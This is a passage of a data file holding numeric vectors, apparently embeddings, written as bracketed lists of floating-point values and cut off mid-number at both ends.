07789491,-0.007413614,-0.09649836,-0.035168428,-0.0025107153,0.035080664,0.07461651,-0.034840446,0.07528023,-0.02574064,0.009698055,-0.035505317,-0.043471575,0.07486549,-0.0014061735,-0.02176042,-0.04581149,-0.010316473,-0.022176493,-0.008655777,-0.01061356,0.021549074,-0.025674436,-0.00010268076,-0.008359791,0.0012959697,-0.04005985,0.046757597,-0.04270918,-0.0034656746,0.04178846,-0.023840526,0.0025898898,0.0157889,-0.00020862087,-0.012942322,-0.013330059,-0.00035361617,0.11371051,0.044255413,0.02321602,-0.049443394,0.025872232,0.0051169787,-0.03273681,-0.06538389,-0.010018295,-0.018402943],[0.01261079,0.057566192,-0.16562812,-0.051639136,0.12944022,-0.08957113,-0.0130758975,0.038786903,-0.010922807,-0.05744561,-0.0456675,0.06762241,0.036874183,-0.001229331,0.013063168,-0.04046896,0.019463113,-0.0522681,-0.012411124,-0.036426492,-0.052289896,-0.022466298,0.024551954,-0.059196137,0.08537151,-0.000060214625,0.036067605,0.022903502,-0.0278109,0.038421813,0.038526077,-0.020782277,-0.008650064,-0.01218567,-0.085160725,-0.07022588,-0.001936484,0.020093862,-0.019911947,-0.0046148174,0.034826193,0.0049342215,-0.012310495,-0.012931934,-0.011685129,-0.0016849204,0.03532229,-0.0044433875,0.048970975,-0.07852962,0.0133866165,-0.0444433,0.06074212,-0.059071597,0.07556408,0.010591118,0.025835972,0.005449322,-0.0073296824,-0.029348293,0.11879135,0.05178796,-0.029931156,0.06112863,0.033369623,-0.014294009,-0.04062283,0.06060444,0.028155377,0.0013131284,0.025627423,-0.007585101,-0.022408769,-0.0073922407,-0.02684013,0.015133668,-0.059518855,-0.057017047,0.031206522,0.05054655,-0.005611995,-0.066725425,0.049700435,0.0054326467,0.0486531,0.00806647,0.009208127,0.00013262033,0.020149501,0.025281016,-0.02158372,-0.025211666,0.016031444,0.040107332,-0.06503395,0.023696238,0.025296941,-0.0068029757,-0.03938782,-0.029328298,-0.030131707,0.002928093,0.0042638388,-0.013644297,-0.0136230495,0.0020784766,0.008124796,0.03472122,-0.014255878,-0.008589981,-0.0121576525,0.07718963,0.019131351,-0.0038230175,0.031176517,-0.018070048,0.009293333,-0.025438905,0.00628944,0.021635115,-0.022806142,-0.038541384,-0.0279299,0.026735328,0.02906202,0.012051247,-0.044221345,0.05160182,0.028143995,-0.09736435,0.0087384,0.005078268,-0.015438001,0.011335524,0.016790286,0.05871398,-0.064797506,-0.029220799,0.023334274,-0.04623202,-0.0032772643,0.019573182,-0.0035895451,-0.07524833,0.039217915,-0.054016992,0.007971275,-0.0118237985,-0.04877697,0.01972256,-0.035171036,0.03139809,0.019035188,0.026635444,0.016357234,-0.028975204,0.0006726926,0.011744127,-0.02810583,0.094239786,0.009812191,0.005365647,-0.04018121,0.05712792,0.019471608,-0.027597813,0.0010847488,0.07548916,0.021185296,0.023298774,-0.020300096,0.001893791,-0.022417605,-0.02766345,-0.00003180749,0.043362986,0.025686027,-0.043706838,0.03777024,-0.03313905,0.028057966,-0.047911875,0.06879079,0.039254494,-0.04370946,-0.023911612,0.030885354,-0.0026122215,-0.020168684,-0.02816829,0.012667399,0.002716894,-0.03894917,0.013492966,-0.05089229,-0.0374809,0.014180489,-0.020008221,0.046635263,-0.030273639,-0.05737132,-0.007978799,0.0055630514,-0.0049073775,-0.03397896,0.037988573,-0.0013050265,0.022680795,-0.009014966,0.042226132,0.06107087,0.019967472,-0.01785245,0.010878518,-0.022868687,-0.043587655,0.00062162156,-0.016514173,-0.0699778,0.0001004956,0.036226016,-0.0205456,0.018290143,0.01792954,0.022930816,-0.007852736,-0.023150126,0.014291143,-0.0029771486,-0.038667765,-0.019414658,-0.072785184,0.070317745,0.0030618676,-0.021986505,0.009335746,0.033501264,0.08957848,0.0027137147,0.017258516,0.0007003536,0.03264189,-0.028961107,0.012966806,-0.041921254,0.0016584201,-0.060198188,-0.039740022,-0.024456963,0.03672184,-0.024676243,-0.0012250248,-0.0053052166,0.0148969395,0.032068714,-0.04762168,-0.04044858,0.0004781758,0.026807714,-0.0141844945,0.057996742,0.010436147,0.008256809,-0.040018424,-0.033895064,-0.057253186,-0.040395938,0.017890513,0.044641282,0.0036518213,0.0035936416,0.040434495,0.08040444,0.06304044,0.002149633,-0.005212053,-0.007036433,-0.02430641,-0.034060337,0.015781118,-0.09649416,-0.005661583,-0.021940453,0.035729088,-0.021580907,-0.015653715,0.03949838,0.017252097,-0.0064401403,-0.007671267,0.046809006,-0.009393301,-0.04399494,0.05172618,0.018862143,-0.005251414,0.08600829,-0.008202739,0.024233911,-0.016750395,0.017990327,0.014792779,0.031181566,0.037631772,-0.03257252,0.016083442,0.0052178903,-0.011802557,0.013259449,-0.020249514,-0.022733748,0.0016126535,0.0019922878,0.012798229,-0.03366773,0.0070390254,0.023073433,-0.013393091,0.018355455,0.021861522,-0.028541077,-0.06944669,0.01956609,-0.039685443,-0.038940407,0.050057698,-0.048030745,0.040286966,-0.043179605,-0.03320417,0.03648605,0.023197828,0.04417112,-0.04692005,-0.041990343,0.03999602,0.011374935,0.015743488,-0.014165283,-0.0060350467,0.050447386,-0.022322692,-0.0026796442,0.008302467,0.02183167,0.021136124,-0.024793401,-0.033231728,0.028338738,0.042400587,-0.060077406,0.018828018,-0.020372922,0.014198502,0.02937327,-0.005334581,0.029417345,0.01642075,0.019154813,-0.0057162666,0.06514407,0.030729538,-0.0044534407,0.034742955,-0.052251898,0.04855232,0.0591277,0.037401102,-0.023514168,0.02352682,-0.008457603,-0.042587213,0.043588217,0.035192374,-0.012165638,0.02007379,-0.060607687,-0.0056616673,0.017572649,0.053624947,-0.020531088,-0.06837537,-0.012734769,0.050206587,0.020334417,-0.05248762,0.048418142,0.002081112,0.038700253,0.07040534,-0.046059202,0.0031981533,-0.042029556,0.04880808,0.033638563,0.0020103555,0.021429813,-0.012725674,-0.028343622,0.024099363,-0.036182966,-0.049652547,0.017779006,0.018856438,-0.0068251444,0.014827837,-0.027308771,-0.0134587865,0.09184803,-0.027712746,0.03483509,-0.02269208,0.0077217077,-0.022696925,0.036668688,-0.0045508374,0.0635895,0.005255858,-0.013843661,-0.06306424,0.03739763,0.028794397,0.022035059,0.0091954935,-0.022855269,-0.03466137,0.02210761,0.071280904,0.03334019,-0.08651766,0.05056245,0.027709365,0.016472219,-0.021851627,0.01951071,-0.032028843,0.016618464,0.019581381,-0.010006026,0.041659463,0.02970064,-0.015377321,-0.010505582,-0.0013849958,0.048624344,0.07289297,0.11529787,-0.051228214,-0.022662327,0.06550807,-0.04993047,-0.011314998,0.04391632,-0.002829817,0.11008558,-0.0146005405,-0.00048181575,0.0070246747,0.052052088,0.025027182,-0.011612124,0.0011223484,-0.075049594,0.031880263,0.016392717,0.0055543967,-0.0049648266,-0.033655763,0.044533066,0.06805777,-0.020013493,-0.009554108,0.038809516,-0.036473535,0.014081387,0.021791244,-0.017977908,0.0029084494,-0.037107684,0.04281818,-0.0009373779,-0.05338753,-0.036759406,-0.060510624,-0.011363073,0.019127127,0.020378666,-0.025851758,-0.027110588,-0.011508335,0.008325042,0.032182656,-0.010248172,0.03587621,-0.03842493,-0.06155972,-0.037327703,0.039586667,0.015280581,0.02845089,0.0068525025,0.0474465,-0.01356133,0.033726543,0.022512883,-0.023641197,0.060590096,-0.064120784,-0.027494654,-0.051898412,-0.0027326704,-0.042836625,0.010173083,0.021714123,0.043597948,-0.014164961,0.047421895,0.01987628,-0.069295734,-0.016056743,0.030946346,-0.032192163,-0.030931626,-0.018756889,-0.05631904,0.0010777889,-0.025240285,-0.041611593,0.010216933,-0.01295143,-0.002420302,-0.026863249,-0.06532319,-0.0056192237,0.033825647,-0.020619411,-0.006325646,0.016065288,-0.0060770116,-0.002209131,0.044064447,0.022111753,0.015636824,-0.012530942,-0.032372873,-0.013278469,0.02349624,0.039877083,-0.04660336,-0.039232276,0.008295315,-0.04609002,-0.03915408,-0.03793261,0.030050155,-0.0038965668,0.04183425,-0.042861942,-0.033119198,-0.01026296,-0.046994712,0.0086636,0.037799306,0.04168978,0.009955064,-0.05854523,-0.03371841,-0.01058163,-0.0042994753,0.046306893,-0.028686574,-0.03523247,-0.047762547,-0.02455784,-0.008843502,0.038415845,0.029337836,0.018482763,-0.03370215,-0.033659708,0.032398663,-0.05771032,0.027014565,0.050262284,-0.0023826458,0.010243476,-0.019556385,-0.020943599,0.055977836,-0.010021975,-0.030440938,0.010544725,0.0029239613,-0.021344714,-0.014834065,0.038807187,-0.018568292,-0.007204148,-0.022854835,-0.01243602,0.010336448,0.040515143,0.029699733,-0.020238316,-0.0053750523,0.0626356,0.021385526,-0.015414577,0.005176147,-0.018920096,0.022923607,0.016776847,-0.03497054,-0.01807861,0.022163179,-0.069257915,0.029511977,0.007841694,0.013939817,-0.0022169538,-0.005589008,-0.06603376,0.021932118,-0.036799002,0.04246817,-0.011401155,-0.029876271,-0.0414834,-0.03020384,0.022708556,-0.04242733,0.045182962,-0.048730455,-0.07842774,-0.083665535,-0.022377832,-0.00007106607,0.03376906,-0.020667216,0.038136713,0.044656623,-0.005662903,0.0046061142,0.012903419,0.012183746,-0.009262038,0.0131242545,0.041404266,0.062053584,0.013221557,0.07979626,0.061881356,0.022284957,0.0030346757,0.04380953,-0.008351679,0.0013361757,-0.023833275,-0.06538457,-0.033179935,0.005725995,0.017266393,-0.0061728866,-0.042704288,0.0514089,0.005057925,-0.04253484,0.011243713,-0.04297377,-0.04955094,0.0005355577,0.024444712,0.02910986,-0.051393587,0.0056107114,0.005561723,0.05965379,0.030966867,-0.030248608,-0.020733355,0.02285281,-0.022013748,0.030097876,-0.03503216,0.03828766,-0.015820548,0.00820583,0.0001527674,-0.040090173,-0.010342105,-0.029475853,-0.040740825,0.0012620654,-0.02470443,-0.029752757,0.05819629,-0.029429384,-0.011009644,-0.043548673,0.057049233,-0.01702015,0.019969063,0.030568501,0.020777682,0.024525195,0.008791648,0.008822175,0.03860142,-0.014412479,-0.03212716,-0.027565176,0.0045214538,-0.005892082,0.04771191,0.015352996,0.024510972,0.025999216,-0.0118821,0.021827832,0.0048556873,0.06395336,-0.01407748,-0.031842824,-0.00958409,-0.011715892,0.011492998,0.00075510476,-0.020946419,0.016055724,0.03266882,0.026439462,-0.060314722,-0.038120996,0.035193138,0.012261213,-0.019520622,-0.057486877,-0.0036703919,-0.061849482,-0.032650232,-0.03730863,0.04440399,-0.05136024,-0.0058395076,0.0085404655,-0.014792283,-0.057523657,0.016015476,-0.020230984,-0.026729079,0.08205954,-0.020205889,-0.014987924,0.0051734084,-0.016556699,0.018016597,-0.03187714,0.05523956,0.11447597,0.049873352,0.03440447,-0.03800829,-0.00031565948,-0.00873476,-0.012493425,-0.023308545,-0.020320663,-0.025848217],[0.000105176754,0.048994012,-0.1686405,-0.053112615,0.086133264,-0.07382379,-0.011894747,0.02967597,-0.0028839144,-0.033391662,-0.0287774,0.063504554,0.017587889,-0.04056139,-0.029328654,-0.04846325,0.044175137,-0.055269573,-0.008827295,0.001337553,0.010215963,-0.07339628,0.022735072,-0.053109054,0.054253377,0.009753645,0.021455856,0.008476169,-0.0097245835,0.0250367,0.025284385,-0.064594686,-0.055988114,-0.037218124,-0.03120118,-0.053076822,0.037484836,-0.030793132,-0.020287305,0.007414807,-0.02464944,0.037855458,0.02626587,-0.058574364,-0.006124537,-0.0042708134,0.030157862,0.054576952,0.0029458231,-0.115633406,0.049453877,-0.043343507,0.008636309,-0.020930007,0.057764504,0.0057832045,0.041699767,0.028067453,0.024566159,-0.07093966,0.076226585,0.07113439,-0.013271654,0.073485665,0.04891057,-0.015255419,-0.037131466,0.03563117,0.033602588,-0.030098626,0.032360796,-0.027371753,0.0091863675,-0.01659741,-0.010805135,0.0072249053,-0.030943412,-0.077943675,0.00043203493,0.031322174,-0.021680847,-0.03782458,0.07244964,-0.0153791085,0.028533285,-0.04027903,-0.029693654,-0.0027012848,-0.04744197,0.040562153,-0.015947772,-0.039070323,0.023585841,0.047039576,-0.079490975,0.008511378,-0.018572219,0.024857804,-0.007556966,0.0007260413,0.0072931605,0.018059656,0.011694686,0.00036757204,0.014847156,0.023383265,0.022360126,0.042330682,0.04192397,0.02905324,0.012040938,0.022261025,0.009208392,0.022476373,0.004464833,-0.044160496,-0.00005138642,-0.01851332,0.02230417,0.025454463,0.0119299665,-0.042472385,-0.01048607,0.04061676,0.05386237,0.03700959,-0.06780505,0.012508112,-0.02416921,-0.07145942,-0.0072941803,0.004660356,-0.05636364,0.0040896856,0.029238299,0.020610187,-0.0015221307,-0.055964276,0.03741646,-0.01386357,0.0014136463,0.057239987,0.014382663,-0.057064597,0.006017819,-0.040083345,-0.009379842,-0.0063984394,-0.08224632,0.04477334,-0.011541733,0.04054542,0.0032715683,0.033205546,0.041486654,0.009930339,0.00703209,0.0019052301,0.010789489,0.08604944,0.0073678107,0.048404206,-0.054006454,0.03373711,-0.0215055,-0.058642168,0.06447391,0.087547444,-0.0163297,0.01989279,-0.054712385,-0.007596122,0.0083552,0.017389659,-0.013142465,0.027362205,0.019481678,-0.028859032,0.03965288,-0.047053397,0.043616448,-0.07997279,0.04956295,-0.013152452,-0.03776285,0.0030591416,0.0014310715,-0.09527596,0.013971923,-0.042736623,0.016718758,-0.014740434,-0.05541653,-0.0013646099,-0.0057267244,-0.028918598,0.026862524,-0.030801542,0.038349837,0.027564133,-0.037674632,0.023617154,-0.008461792,0.019670468,-0.06113021,0.04074913,0.00887495,-0.010256402,-0.0033923734,0.008629088,0.050607443,-0.021188948,0.018897334,-0.020621128,-0.011716718,0.0037965204,0.0044043115,-0.05428491,-0.04650402,0.022273982,0.012397506,0.0039247805,0.013642569,-0.01357205,0.037106056,0.009259783,-0.0433202,0.009031649,0.02374297,-0.025517663,-0.05263236,-0.08747312,0.03204453,0.0059536374,-0.019259684,0.004247969,-0.020801598,0.049373012,0.002705784,0.023233822,0.027213512,0.03769879,-0.048068013,0.048112012,-0.038732365,-0.0010777885,-0.043873936,-0.05536118,0.007980288,0.016397905,0.025468089,0.008505428,0.0028979839,0.016364189,0.036233388,-0.0370655,0.013393681,0.014577406,-0.003956576,-0.031784087,0.0018667029,0.021969175,0.008845099,-0.02201134,-0.030859943,-0.050589804,-0.036462862,0.07704711,-0.024968028,0.045508817,-0.009521396,0.031123195,0.053055197,0.0520212,-0.014937148,0.017700559,0.048873447,-0.024498759,-0.033872414,0.016725661,-0.06006948,-0.015228581,-0.018418293,-0.017343404,-0.0009698737,-0.04390241,0.0011914107,-0.040785763,-0.022282306,-0.02326668,0.062259432,-0.011492701,-0.024858944,0.044806957,-0.04854187,-0.03632548,0.03349797,-0.015836928,-0.016542431,-0.030067354,0.043178495,0.06321387,-0.009491148,0.072451875,-0.003961558,-0.0060933237,0.04118517,0.0068325745,0.006528374,0.008452373,-0.026796527,-0.0037334661,-0.0024059934,0.036064964,-0.008938777,0.046045344,0.04382352,0.008599385,0.023622837,0.0013600385,-0.0045603397,-0.0034719754,0.012498241,-0.019932425,-0.008540958,0.011401645,-0.028997898,0.009899116,-0.014627314,-0.029262261,0.011389811,0.021339908,-0.00071512716,-0.035523586,-0.04011997,0.01368722,0.015040378,0.020042714,-0.0044492083,0.025532108,0.037854463,-0.03285832,-0.009935724,-0.046978917,-0.0232577,0.045481212,-0.0075072492,-0.0005789929,0.061302394,0.0235317,-0.0135779595,0.04284257,-0.0208031,-0.028399728,0.013535606,-0.044440884,0.03764931,0.026631953,-0.018698676,0.020872448,0.036766622,0.04812087,0.009372785,-0.03699506,0.02701358,0.040611267,0.025751105,-0.017243315,0.009941319,0.013434251,-0.0018102585,-0.030773979,0.008346869,0.06372454,-0.021160798,-0.0016843795,-0.06512015,0.011601507,-0.004604658,0.020589143,0.025419446,-0.06616705,-0.019083261,0.037822492,0.012274778,-0.011870333,0.027913943,-0.008439421,-0.005264608,0.059148133,0.038661715,-0.0075367875,-0.025811559,0.022759838,0.029349351,-0.03504763,-0.0052355607,-0.0042672534,0.009668968,0.024686389,-0.05856335,-0.06846614,0.012100277,-0.0014740615,-0.032510858,-0.0009050541,-0.056184802,0.005277602,0.08478259,0.005349326,0.051907532,-0.009085826,-0.048642404,-0.047085244,0.009264037,0.009254909,0.046424396,0.025811935,-0.010434486,-0.04638602,-0.044304837,0.023444254,0.029189277,-0.009268238,-0.025552928,0.026334671,0.04590886,0.036850613,-0.0032943995,-0.11781157,-0.0034444595,0.038208254,0.031836677,-0.0122797,0.022037027,-0.0073713744,0.043240115,0.023214899,-0.0022578274,0.00071959454,0.059722994,-0.0117333,-0.050979465,-0.0409497,0.00092613883,0.0937334,0.11816171,-0.0314789,-0.053538483,0.021084296,-0.031138,-0.003956827,0.009020746,0.00841368,0.08560669,0.0137159275,0.02420253,-0.0010378424,0.00040678127,-0.006793566,-0.009797421,0.01736675,-0.048556663,-0.009953377,0.0026811396,0.06951604,0.00036553096,-0.02399784,0.04876484,0.095073104,-0.04218468,-0.004921855,0.030879213,0.00070564076,0.045315664,0.0125911925,-0.024463866,0.049087103,-0.021136083,0.046541642,0.021701774,-0.024680305,-0.050207134,-0.038170014,-0.018229906,0.015474634,-0.0010283345,-0.0065573584,0.02580141,-0.028893955,0.002977668,0.033280615,-0.009953042,0.030992392,-0.014928487,-0.05061398,0.025732031,0.022942217,0.0038973568,0.025917761,0.07322026,0.023549136,-0.051615283,0.019092755,0.044083115,-0.046005026,0.046340752,-0.039124705,-0.014086522,-0.05179513,-0.02522363,0.0024938786,0.03267043,0.0062411143,0.061960224,-0.0014204746,0.009114754,-0.03762441,-0.04613173,-0.0022545252,0.013090023,0.0032609708,-0.018189179,0.010659801,-0.022175016,0.034289323,-0.02320744,0.013305342,-0.002337238,-0.02695427,-0.0114553645,-0.014782577,-0.06075627,0.013195359,0.036335997,-0.010354159,-0.02067403,0.016269201,-0.0051334966,0.026976341,0.06157474,0.0128817605,0.043160565,-0.015968341,-0.018524723,-0.05906076,-0.0186823,0.050765067,0.0070561483,-0.042822376,0.064199544,-0.058667127,0.0064198347,-0.03630764,0.025886478,-0.045101024,-0.001956754,-0.00844863,-0.031861603,-0.0159132,-0.039503153,-0.017263684,0.06845275,0.029376503,0.01802052,-0.006559912,-0.02491232,-0.009046162,0.010837336,0.029437674,-0.050668687,-0.06298043,-0.030951213,-0.016942136,-0.0038090083,0.06300266,0.022501687,-0.01409682,-0.071807645,-0.02174472,0.039284952,-0.0016531713,0.015327234,0.015348922,-0.009744714,0.0028225745,-0.054601558,-0.053775225,0.06228164,-0.055192538,-0.050477356,-0.002529879,0.04690466,0.036076758,-0.03128342,0.030483779,-0.024420341,-0.004219304,0.004548299,-0.016424062,-0.029339962,0.015872918,0.020621099,-0.032235384,-0.009506626,0.07447304,0.0066111763,-0.022096988,-0.023742028,-0.006155629,0.035492353,0.009810555,-0.0036734524,-0.029639835,-0.0027525623,-0.04562853,0.020028654,0.004173797,0.0073253266,-0.058347527,-0.016046124,-0.05283567,0.00058188994,-0.05687061,0.026662908,-0.013232061,0.0050506555,-0.07507408,-0.0077827405,0.03449987,-0.045584854,0.010421546,-0.06360364,-0.03641752,-0.08389271,0.04536714,-0.019308535,0.023345748,-0.014693159,0.05633438,0.09831357,-0.0061432584,-0.049846668,0.006779385,-0.01266621,-0.031192573,0.018459871,0.07948563,0.049940363,0.011546982,0.062929325,0.052585397,0.03990277,0.014802229,0.025829118,-0.06003507,0.024100142,-0.03351678,-0.05773054,-0.01837874,0.0057378253,0.0145622995,-0.0154079385,-0.03335718,0.048262723,-0.005464765,-0.017281516,-0.0059526544,-0.033893652,-0.031641085,0.00600956,0.035997402,0.002615513,-0.027979394,0.050145328,-0.047350384,0.084802195,0.026954232,-0.04150883,-0.025952626,0.00003029781,0.019823587,0.053271398,-0.026705913,0.0072222496,-0.022997601,0.030256482,-0.031004256,-0.069367275,-0.01772373,-0.00810342,0.012077031,0.033119883,-0.029987859,0.013249339,0.03370815,-0.006918023,-0.046505213,-0.04795362,0.046812903,0.013903692,0.030809985,0.04974198,0.046722103,0.010985815,0.019934546,-0.006202588,0.032138158,0.031701118,-0.013749272,-0.0036627,-0.0013857501,-0.04673138,0.036304813,-0.020669492,0.034873847,0.027893933,-0.02345842,0.032028183,0.04145571,0.067557156,-0.011710408,-0.050783213,0.021065673,0.0050862767,0.013865436,0.06919668,-0.01997589,0.015101176,-0.007861397,0.011460576,-0.036203958,-0.037777804,0.037541635,0.011158608,-0.021872193,-0.025653936,-0.03458286,-0.045888044,-0.044926606,-0.0073961182,0.0085723,-0.055308115,0.024341274,0.019424202,-0.027559865,-0.03167248,0.017230827,0.021292156,-0.004315247,0.04514485,0.033657484,-0.00054427533,0.022158934,-0.042810544,-0.037138347,0.018747587,0.03249112,0.08981798,0.02794143,0.0358161,-0.06340718,0.0050089234,0.009928636,-0.004445029,-0.05977136,-0.029067881,-0.061509203],[0.055882215,0.007320957,-0.16894774,-0.018425833,0.11269538,-0.08330365,-0.03642058,0.016548527,0.034146998,-0.02065193,-0.05859209,0.0920915,0.064361475,0.006871103,-0.012100965,-0.06756903,0.04404709,-0.016535701,-0.013091651,-0.02368557,-0.036592532,-0.03057277,0.0050822045,-0.034671843,0.07024029,-0.00023263661,-0.0054237805,0.035664283,0.007876679,0.011947441,0.021021683,-0.02068095,-0.053883478,0.009403497,-0.09218456,-0.025854096,0.030640054,0.035840794,-0.03668345,-0.0030220943,0.052396245,0.027391074,0.010735078,-0.02977739,-0.011656474,0.033047084,0.043567088,0.05160981,0.06448552,-0.09652389,0.019700967,-0.028025908,-0.015700543,-0.043855872,0.093493074,0.0066204676,-0.019003998,0.01916876,-0.0073859026,0.0008223249,0.06377471,0.061198574,-0.005129262,0.021628547,0.041193955,-0.012010436,-0.030114504,0.07007008,0.06566937,0.000019062374,0.029096078,-0.001684877,-0.01725734,0.011324857,0.0055787973,-0.003551,-0.02159488,-0.054916564,0.05704268,0.05232885,-0.008680935,-0.0147881815,0.08115873,0.011206423,0.040201034,-0.0050750687,-0.053337224,-0.03516523,-0.026480855,0.045351356,0.010404707,-0.047227588,0.016772067,0.041256916,-0.08486339,0.02629815,0.02201961,0.02472245,-0.044052873,-0.004712016,0.0019421976,-0.014938521,0.04174302,-0.014225806,-0.015893493,0.048475124,0.0015579719,0.015600958,0.029398676,0.001195731,-0.004881117,0.053797927,0.010208613,-0.03987089,0.046451405,0.0029846937,0.02171186,-0.043943536,-0.008588729,0.024279546,0.0010090821,-0.03915888,-0.023409097,0.044217907,0.004504013,0.022910574,-0.030018179,0.029669624,0.027345922,-0.059869733,-0.057021257,-0.02044985,-0.014449706,0.031236634,0.020643026,0.04224557,-0.047900442,-0.040573817,0.018844381,-0.020225158,-0.0053301784,0.023225874,0.008366453,-0.034151137,0.010277738,-0.03330694,0.055743374,-0.057852022,-0.035616614,0.029953051,-0.024279764,0.010347375,-0.0031760745,0.023590796,0.037159603,-0.022329513,0.0003188579,-0.034158967,0.0013398556,0.044190973,-0.0047796755,0.0032595827,-0.05315265,0.057548594,-0.015993373,-0.05385549,0.011948446,0.063258074,0.009774652,0.036007334,-0.029714476,0.011419565,-0.011832747,-0.036226157,0.006573043,0.020563755,0.030702518,-0.010952,0.004925358,-0.029652089,0.03654783,-0.06644064,0.041652553,-0.00634636,0.0034943013,-0.015952758,0.02776245,-0.02955405,0.01768817,-0.004052424,0.048537545,0.013001007,-0.06704149,-0.019615214,-0.015991025,-0.06870131,0.009227498,-0.002961783,0.00785937,-0.0066338014,-0.05495839,-0.03309019,-0.03674225,0.005554164,-0.056064658,0.029186688,-0.029890835,0.016739821,-0.009092216,0.034685995,0.047315385,0.018014953,-0.016596429,0.0071161925,-0.046911117,-0.022903927,0.014985983,-0.028821832,-0.04726137,0.0039979545,0.0054831393,-0.023781464,0.009406071,-0.0044824,0.036604565,-0.0022069637,0.0035374754,-0.0071058706,-0.019486321,-0.04436727,-0.028460301,-0.073320165,0.05209225,0.0077928724,-0.023704343,0.004319972,-0.009781536,0.06872229,-0.03285904,0.03754938,0.00010293909,0.05370771,-0.0408629,0.008023614,-0.060801014,0.051037554,-0.048002858,-0.041289665,-0.020879414,0.021469617,-0.037645817,0.03166639,0.023636663,0.0025005788,0.03836549,-0.07005113,-0.033894982,0.009175249,0.020767003,-0.008725351,0.0036151335,-0.022338098,0.025732068,-0.065191634,-0.040196013,-0.077379175,-0.020035237,0.022623232,0.04175281,0.014794441,-0.011492186,0.01476098,0.018326446,0.10098561,0.0020158212,0.037799925,0.020209529,-0.05267456,0.0010391336,-0.030576872,-0.058232322,0.0040428895,-0.012079563,0.0040007043,0.015273792,0.011239975,0.0131423315,-0.02119602,0.009575173,-0.0007544846,0.038152438,-0.057098906,-0.047068156,0.064990774,-0.041750528,-0.01363433,0.07285743,0.019190101,0.026455963,-0.011292975,0.06441684,0.029561728,0.0016762569,0.05358269,-0.01648481,0.0122112185,-0.010011351,0.0018450572,0.004345608,-0.014451193,-0.024976881,-0.011903639,-0.010455634,0.040368665,-0.036525015,0.030038185,0.030324101,-0.002101017,-0.0011910553,-0.009895397,-0.021826189,-0.034120794,0.011170416,-0.035478834,-0.03497808,0.02406966,-0.0139027955,0.020866962,-0.022290077,-0.04665406,0.037922475,-0.002345681,0.036328077,-0.05570978,-0.01744629,0.01320644,0.0024138489,0.024102326,-0.040060498,0.032105282,-0.0026165461,-0.028651567,-0.0094853295,-0.044688042,0.007121923,0.0067751156,-0.058293913,0.0014473463,0.06253831,0.00848203,-0.030205369,0.045966573,-0.010889241,0.0037618575,0.024780706,-0.0140701365,0.015853738,-0.009492046,0.0016174166,0.0014643904,0.048174713,0.038054638,-0.017832952,0.028678006,-0.008537615,0.029052028,0.050204046,0.023661587,-0.0043382635,-0.008490248,-0.0016750614,0.0069127856,0.02826593,0.020904606,-0.0088583445,0.010340473,-0.10102034,0.026912183,-0.027352419,0.049250063,-0.02662985,-0.066635646,-0.02777741,0.011879155,0.04551383,0.00004372954,0.048007607,-0.016542956,-0.011171933,0.05993879,-0.0069304807,0.0049165064,-0.0031493206,-0.006006943,0.0037193121,-0.04447109,0.015417648,0.00041990716,-0.01840909,0.033594217,-0.026678395,-0.05419347,0.064991206,0.026661105,0.016323896,0.012294766,-0.030861607,-0.029604737,0.09456628,0.007055992,0.023240255,-0.0030541408,-0.030145744,-0.033720493,0.041475195,0.008641964,0.06568773,-0.0033574095,-0.0041642925,-0.05093098,0.058634896,0.022648146,0.021741288,-0.008504167,-0.014387675,-0.017065413,0.021731654,0.04995985,0.02438894,-0.06993536,0.010048111,0.017928742,0.01203523,-0.046258252,-0.0023642327,-0.044813152,0.015112428,0.05796903,0.0075908215,0.048944335,0.040580235,0.0011909499,-0.04922415,-0.02136195,0.021836698,0.07450879,0.10315569,-0.025128473,-0.028020239,0.03615106,-0.026828313,-0.0075890254,0.03592999,0.0026589104,0.101655886,-0.033794627,0.0077339835,0.010529729,0.011038673,0.038338285,0.003840693,0.058843564,-0.076347046,0.020897133,0.059853792,0.016038604,-0.030281156,-0.024422321,0.04793008,0.08176811,-0.06812365,-0.02762977,0.03071548,-0.021563223,0.044060677,-0.022774553,-0.013759914,0.038224917,-0.05069699,0.076509796,-0.0046134484,-0.019016854,-0.022434665,-0.023730697,-0.0046922956,0.045533746,0.011329185,-0.005895351,0.021504944,-0.014575161,0.0064013246,0.037946057,0.005734032,0.05390846,-0.025364952,-0.06758213,-0.010388472,-0.008055964,0.005222054,0.029595817,0.03667766,0.007866441,-0.03320215,0.013112318,0.04245268,-0.045592386,0.03239762,-0.060744304,-0.026258335,-0.07592732,0.007027565,-0.047532406,0.019320505,0.020285767,0.058039013,-0.03383037,0.035163898,-0.015641442,-0.06548922,0.023563903,0.018034821,-0.044455566,-0.038338576,-0.012995632,-0.022361493,-0.016680026,0.004322416,-0.022042496,0.042181205,-0.016036564,0.016840238,0.0069322153,-0.0602039,-0.006046784,0.053234335,-0.01324083,-0.024363289,0.027827272,-0.018768214,0.05243628,0.010681593,0.017762091,0.024857102,-0.0020217092,0.036517188,-0.039331436,0.012318246,0.058115344,-0.0084062265,-0.018588353,0.04539583,-0.054720104,0.015245156,-0.05464582,0.019563863,0.0049438924,0.013496072,-0.011193497,-0.038838383,-0.03183061,-0.01300359,-0.003458094,0.05010119,0.013549644,-0.0043111495,-0.022557914,-0.03585156,0.0020296734,-0.0026523916,0.021710536,-0.015159838,-0.05508795,-0.04745014,-0.062479485,-0.014615154,0.04780003,0.022077529,0.015990112,-0.020532794,-0.057808504,0.03336756,-0.05267224,-0.00003285031,0.013148273,-0.019706758,-0.01552938,-0.046656493,-0.04748389,0.068083525,-0.020906914,-0.03342761,-0.005311758,0.0035023119,0.0031133918,-0.00087416195,0.039414175,-0.038763445,0.002319652,-0.042147048,-0.0052552433,0.008538353,0.005790974,0.013416108,-0.029145228,-0.008963186,0.07358766,0.0070789186,0.005393936,0.004326343,-0.004181856,0.010648009,0.0072517027,-0.005182132,-0.035105206,-0.013863272,-0.07830819,0.040927034,0.008813877,0.0010549274,-0.0112767685,-0.02933794,-0.07697428,0.035315078,-0.010922932,0.06574641,-0.010968017,-0.009584266,-0.055823337,-0.052263733,0.0066089155,-0.051418938,0.06489698,-0.06327861,-0.081636086,-0.07521594,0.023081385,0.0012105368,0.0003534031,-0.034777615,0.05649414,0.037885625,0.022576952,-0.005694558,-0.016428154,-0.0009097681,-0.0101516,0.010876726,0.06937895,0.033565976,0.040922776,0.06956703,0.08275862,0.0073452294,-0.016066736,0.05968556,-0.045439344,-0.0075582885,0.0085815685,-0.07513988,-0.039043013,0.008450964,-0.011947678,-0.0070560127,-0.037014566,0.02480531,-0.010657637,-0.013424021,-0.016871668,-0.02422569,-0.060012307,0.023200814,0.023624498,0.014740189,-0.037460536,0.013808544,-0.023742383,0.05350692,0.06279848,-0.04